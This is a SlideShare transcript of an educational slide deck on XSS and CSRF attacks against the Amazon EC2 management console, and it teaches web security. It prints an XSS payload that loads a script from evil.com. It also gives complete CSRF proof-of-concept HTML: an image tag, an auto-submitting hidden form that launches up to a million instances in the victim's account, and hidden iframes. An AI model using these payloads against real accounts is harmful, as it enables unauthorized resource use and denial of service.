SlideShare uma empresa Scribd logo
1 de 32
Marco Arena
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – Web management console
  – Amazon Web Services (AWS) portals
• Conclusions
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – Web management console
  – Amazon Web Services (AWS) portals
• Conclusions
Recalls
• XSS (Cross-Site Scripting) vulnerability
  allows an attacker to use a website to
  transmit an attack (the website becomes
  the vector through which attackers reach
  their victims).

• XSS is today’s most widely reported
  software vulnerability.
Recalls
• XSS, a simple example:

  <c:if test=“${param.sayHello}”>   Server-Side JSP
     Hello ${param.name}!
  </c:if>

   Evil parameter:

     %3Cscript%20src%3D%22Dhttp%3A//evil.com/evil.js%22%3E%3C
     /script%3E

   Result:

   Hello <script src=“http://evil.com/evil.js”></script>
Recalls
• CSRF (Cross-Site Request Forgery) is an
  attack which forces an end user to
  execute unwanted actions on a web
  application in which he/she is currently
  authenticated.

• CSRF tricks the victim into loading a page
  that contains a malicious request.
Recalls
• CSRF, a simple example:
                                ...
                                       <img
                                src=“http://truste
Trusted blog (i.e. MySpace)     dblog.com/addfrien
                                 d.php?id=12345”/>
                                ...
               Active session



User                                     Evil Site
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – Web management console
  – Amazon Web Services (AWS) portals
• Conclusions
Attacks against EC2
• The Amazon EC2 cloud is managed via web
  services and web interface consoles.

• The web management console asks the user to
  provide her Amazon.com username and
  password.

• The login page is hosted on the Amazon.com
  domain, making it susceptible to web
  application vulnerabilities found anywhere on
  the domain.
Attacks against EC2
• Once an attacker gains access to the EC2
  user’s session, the Amazon web
  management console offers a wealth of
  information related to the victim’s EC2
  instances (X.509 certificates, secret
  tokens, ...).
Attacks against EC2
• If the attacker discovers an XSS
  vulnerability anywhere on the
  Amazon.com domain, he can use a simple
  JavaScript payload to steal the EC2 user’s
  Access Key ID and Secret Access Key.
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – Web management console
  – Amazon Web Services (AWS) portals
• Conclusions
Amazon EC2 real vulnerabilities
• The security of AMI instances depends on
  the web management console for
  security.

• Several portions of Amazon’s web
  management console were vulnerable to
  cross-site request forgery (CSRF) attacks.
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – Web management console
  – Amazon Web Services (AWS) portals
• Conclusions
Web management console vulnerabilities

• The first allows the attacker to start an
  arbitrary AMI instance using the victim’s
  EC2 account.

• Two parts:
  – Initialize an evil AMI;
  – Launch the instance under the victim’s EC2
    account.
Web management console vulnerabilities

initialize.html:

<html>
<body>
<img
  src="https://console.aws.amazon.com/ec2/_launchWizar
  dForm.jsp?
  action.ImageId=ami-00031337&architecture=i386&
  image_icon=%2Fimages%2Flogo_windows.gif&
  image_title=Basic%20Microsoft%20Windows%20Server%202
  003&
  selected_language=undefined&groupName=Webserver&keyN
  ame=undefined">
</body>
</html>
Web management console vulnerabilities

initialize.html:
              Cross-Domain
<html>
             Image Tag
<body>
<img
  src="https://console.aws.amazon.com/ec2/_launchWizar
  dForm.jsp?
  action.ImageId=ami-00031337&architecture=i386&
  image_icon=%2Fimages%2Flogo_windows.gif&
  image_title=Basic%20Microsoft%20Windows%20Server%202
  003&
  selected_language=undefined&groupName=Webserver&keyN
  ame=undefined">
</body>
</html>
Web management console vulnerabilities

launch.html:
<html>
<body>
<form action="https://console.aws.amazon.com/ec2/runInstancesJson?"
id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST">
<input type="hidden" name="action.MinCount" value="1" />
<input type="hidden" name="action.InstanceType" value="m1.small" />
<input type="hidden" name="action.SecurityGroup" value="default" />
<input type="hidden" name="action.SecurityGroup" value="Webserver" />
<input type="hidden" name="action.MaxCount" value="1000000" />
<input type="hidden" name="action.ImageId" value="ami-00031337" />
<input type="hidden" name="mbtc" value="50084" />
<input type="hidden" name="region" value="us-east-1" />
</form>
<script>
setTimeout("document.LaunchEvilAMI.submit()",5000);
</script>
</body>
</html>
Web management console vulnerabilities
Web management console vulnerabilities

Merge:

<html>
<body>
<iframe src="./initialize.html" height="0"
  width="0"></iframe>
<iframe src="./launch.html" height="0"
  width="0"></iframe>
</body>
</html>
Web management console vulnerabilities

Merge:            The browser will not
                  display the reply of
<html>              the web server.

<body>
<iframe src="./initialize.html" height="0"
  width="0"></iframe>
<iframe src="./launch.html" height="0"
  width="0"></iframe>
</body>
</html>
Web management console vulnerabilities

• The second vulnerability terminates
  arbitrary AMIs being run by the victim.

• After the attack is launched, the victim
  can see that the instance was terminated
  without her consent.
Web management console vulnerabilities

• The last vulnerability involves the
  deletion of AMI key pairs.

• Using a CSRF vulnerability, an attacker
  has the ability to delete arbitrary key
  pairs from a victim’s EC2 session. If the
  key pair is deleted, and the user has not
  properly backed up the key pair, he will
  have lost access to his own AMIs!
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – Web management console
  – Amazon Web Services (AWS) portals
• Conclusions
AWS portals vulnerabilities

• AWS was the first method Amazon provided to
  manage AMIs and is generally considered the
  most secure option for AMI administration.

• The three most common methods of
  authentication are :
  – a username/password combination;
  – an Access Key ID/Secret Access Key combination;
  – and X.509 certificates
AWS portals vulnerabilities

• AWS was the first method Amazon provided to
  manage AMIs and is generally considered the
  most secure option for AMI administration.

• The three most common methods of
  authentication are :
  – a username/password combination;
  – an Access Key ID/Secret Access Key combination;
  – and X.509 certificates.
AWS portals vulnerabilities

• The first attack against AWS generates a new
  access key for the EC2 user’s session.

• Access keys are used to authenticate a user to
  AWS, which is used to administer and manage
  the various AMIs running in a user’s account.

• The attacker can create a temporary denial of
  service as the administrator must now update
  all the applications utilizing access key
  authentication to use the newly generated key.
AWS portals vulnerabilities

• This next attack forcibly deletes any
  X.509 certificates previously generated
  by the EC2 user.

• Once the X.509 certificates are deleted,
  any application that relied on X.509
  certificate authentication must be
  redeployed with the newly generated
  certificates.
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – Web management console
  – Amazon Web Services (AWS) portals
• Conclusions
Conclusions

• Cloud Computing allows organizations to
  focus on their core business while
  ensuring that their IT infrastructures are
  flexible enough to meet the demands of
  current and future users.

• But it does not magically protect
  application logic from abuse or prevent
  attacks against the application level.
Conclusions

• Uploading the most hardened virtual
  machine will not prevent attacks against
  the web-based management consoles
  that are used to administer the virtual
  machines.

• Cloud providers must fix their security
  bugs and perform an incessant code
  review.
References

• Hacking: the Next Generation
 Nitesh Dhanjani, Billy Rios, and Brett Hardin. O’Reilly, 2009.


• Hacking Exposed: Web 2.0
 Rich Cannings, Himanshu Dwivedi, Zane Lackey. Mc-Graw Hill, 2008


• Secure Programming with Static Analysis
 Brian Chess, Jacob West. Addison-Wesley, 2007.

Mais conteúdo relacionado

Mais procurados

Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
AWS Instance Preparation
AWS Instance PreparationAWS Instance Preparation
AWS Instance PreparationEbizon
 
Cloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsCloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsAri Apridana
 
Security Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupSecurity Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupAngela Bowman
 

Mais procurados (6)

Amazon cloudtutorial
Amazon cloudtutorialAmazon cloudtutorial
Amazon cloudtutorial
 
Security Function
Security FunctionSecurity Function
Security Function
 
AWS Instance Preparation
AWS Instance PreparationAWS Instance Preparation
AWS Instance Preparation
 
Cloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsCloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its Threats
 
Xss frame work
Xss frame workXss frame work
Xss frame work
 
Security Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupSecurity Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress Meetup
 

Destaque

Mos presentation 6 10
Mos presentation 6 10Mos presentation 6 10
Mos presentation 6 10LJepson
 
4 as speech 1993 newman and white
4 as speech 1993 newman and white4 as speech 1993 newman and white
4 as speech 1993 newman and whiteDosage
 
【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室Fujtia Naoya
 
The Dawn Of New Web Giant
The Dawn Of New Web GiantThe Dawn Of New Web Giant
The Dawn Of New Web Giantparamlowe
 
Expansion termica Expansion lineal
Expansion termica   Expansion linealExpansion termica   Expansion lineal
Expansion termica Expansion linealMAREST10
 
Ad age planning imported 1983
Ad age planning imported 1983Ad age planning imported 1983
Ad age planning imported 1983Dosage
 

Destaque (7)

Mos presentation 6 10
Mos presentation 6 10Mos presentation 6 10
Mos presentation 6 10
 
4 as speech 1993 newman and white
4 as speech 1993 newman and white4 as speech 1993 newman and white
4 as speech 1993 newman and white
 
【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室
 
The Dawn Of New Web Giant
The Dawn Of New Web GiantThe Dawn Of New Web Giant
The Dawn Of New Web Giant
 
Expansion termica Expansion lineal
Expansion termica   Expansion linealExpansion termica   Expansion lineal
Expansion termica Expansion lineal
 
Ad age planning imported 1983
Ad age planning imported 1983Ad age planning imported 1983
Ad age planning imported 1983
 
Cloud Security
Cloud SecurityCloud Security
Cloud Security
 

Semelhante a Cloud Insecurity

Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Amazon Web Services
 
Best Practices for Security at Scale
Best Practices for Security at Scale Best Practices for Security at Scale
Best Practices for Security at Scale Amazon Web Services
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Architecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesArchitecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesAmazon Web Services
 
Security Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtSecurity Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtHelen Rogers
 
Amazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep DiveAmazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep DiveAmazon Web Services
 
Aws big picture_overview
Aws big picture_overviewAws big picture_overview
Aws big picture_overviewAjay Bidari
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!政雄 金森
 
Best Practices for Security at Scale
Best Practices for Security at ScaleBest Practices for Security at Scale
Best Practices for Security at ScaleAmazon Web Services
 
Running your First Application on AWS
Running your First Application on AWSRunning your First Application on AWS
Running your First Application on AWSAmazon Web Services
 
Primeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverlessPrimeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverlessAmazon Web Services
 
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh VariaAWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh VariaAmazon Web Services
 
AWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 MasterclassAWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 MasterclassAmazon Web Services
 
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...Amazon Web Services Korea
 

Semelhante a Cloud Insecurity (20)

Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
 
Best Practices for Security at Scale
Best Practices for Security at Scale Best Practices for Security at Scale
Best Practices for Security at Scale
 
Getting Started with Amazon EC2
Getting Started with Amazon EC2Getting Started with Amazon EC2
Getting Started with Amazon EC2
 
Amazon s3ec2
Amazon s3ec2Amazon s3ec2
Amazon s3ec2
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Architecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesArchitecting for the Cloud: Best Practices
Architecting for the Cloud: Best Practices
 
Aws interview questions
Aws interview questionsAws interview questions
Aws interview questions
 
Security Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtSecurity Best Practices_John Hildebrandt
Security Best Practices_John Hildebrandt
 
Amazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep DiveAmazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep Dive
 
Cloud Security (AWS)
Cloud Security (AWS)Cloud Security (AWS)
Cloud Security (AWS)
 
Aws big picture_overview
Aws big picture_overviewAws big picture_overview
Aws big picture_overview
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!
 
Best Practices for Security at Scale
Best Practices for Security at ScaleBest Practices for Security at Scale
Best Practices for Security at Scale
 
Running your First Application on AWS
Running your First Application on AWSRunning your First Application on AWS
Running your First Application on AWS
 
Primeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverlessPrimeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverless
 
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh VariaAWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
 
AWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 MasterclassAWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 Masterclass
 
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
 

Último

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 

Último (20)

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 

Cloud Insecurity

  • 2. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 3. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 4. Recalls • XSS (Cross-Site Scripting) vulnerability allows an attacker to use a website to transmit an attack (the website becomes the vector through which attackers reach their victims). • XSS is today’s most widely reported software vulnerability.
  • 5. Recalls • XSS, a simple example: <c:if test=“${param.sayHello}”> Server-Side JSP Hello ${param.name}! </c:if> Evil parameter: %3Cscript%20src%3D%22Dhttp%3A//evil.com/evil.js%22%3E%3C /script%3E Result: Hello <script src=“http://evil.com/evil.js”></script>
  • 6. Recalls • CSRF (Cross-Site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. • CSRF tricks the victim into loading a page that contains a malicious request.
  • 7. Recalls • CSRF, a simple example: ... <img src=“http://truste Trusted blog (i.e. MySpace) dblog.com/addfrien d.php?id=12345”/> ... Active session User Evil Site
  • 8. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 9. Attacks against EC2 • The Amazon EC2 cloud is managed via web services and web interface consoles. • The web management console asks the user to provide her Amazon.com username and password. • The login page is hosted on the Amazon.com domain, making it susceptible to web application vulnerabilities found anywhere on the domain.
  • 10. Attacks against EC2 • Once an attacker gains access to the EC2 user’s session, the Amazon web management console offers a wealth of information related to the victim’s EC2 instances (X.509 certificates, secret tokens, ...).
  • 11. Attacks against EC2 • If the attacker discovers an XSS vulnerability anywhere on the Amazon.com domain, he can use a simple JavaScript payload to steal the EC2 user’s Access Key ID and Secret Access Key.
  • 12. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 13. Amazon EC2 real vulnerabilities • The security of AMI instances depends on the web management console for security. • Several portions of Amazon’s web management console were vulnerable to cross-site request forgery (CSRF) attacks.
  • 14. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 15. Web management console vulnerabilities • The first allows the attacker to start an arbitrary AMI instance using the victim’s EC2 account. • Two parts: – Initialize an evil AMI; – Launch the instance under the victim’s EC2 account.
  • 16. Web management console vulnerabilities initialize.html: <html> <body> <img src="https://console.aws.amazon.com/ec2/_launchWizar dForm.jsp? action.ImageId=ami-00031337&architecture=i386& image_icon=%2Fimages%2Flogo_windows.gif& image_title=Basic%20Microsoft%20Windows%20Server%202 003& selected_language=undefined&groupName=Webserver&keyN ame=undefined"> </body> </html>
  • 17. Web management console vulnerabilities initialize.html: Cross-Domain <html> Image Tag <body> <img src="https://console.aws.amazon.com/ec2/_launchWizar dForm.jsp? action.ImageId=ami-00031337&architecture=i386& image_icon=%2Fimages%2Flogo_windows.gif& image_title=Basic%20Microsoft%20Windows%20Server%202 003& selected_language=undefined&groupName=Webserver&keyN ame=undefined"> </body> </html>
  • 18. Web management console vulnerabilities launch.html: <html> <body> <form action="https://console.aws.amazon.com/ec2/runInstancesJson?" id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST"> <input type="hidden" name="action.MinCount" value="1" /> <input type="hidden" name="action.InstanceType" value="m1.small" /> <input type="hidden" name="action.SecurityGroup" value="default" /> <input type="hidden" name="action.SecurityGroup" value="Webserver" /> <input type="hidden" name="action.MaxCount" value="1000000" /> <input type="hidden" name="action.ImageId" value="ami-00031337" /> <input type="hidden" name="mbtc" value="50084" /> <input type="hidden" name="region" value="us-east-1" /> </form> <script> setTimeout("document.LaunchEvilAMI.submit()",5000); </script> </body> </html>
  • 19. Web management console vulnerabilities
  • 20. Web management console vulnerabilities Merge: <html> <body> <iframe src="./initialize.html" height="0" width="0"></iframe> <iframe src="./launch.html" height="0" width="0"></iframe> </body> </html>
  • 21. Web management console vulnerabilities Merge: The browser will not display the reply of <html> the web server. <body> <iframe src="./initialize.html" height="0" width="0"></iframe> <iframe src="./launch.html" height="0" width="0"></iframe> </body> </html>
  • 22. Web management console vulnerabilities • The second vulnerability terminates arbitrary AMIs being run by the victim. • After the attack is launched, the victim can see that the instance was terminated without her consent.
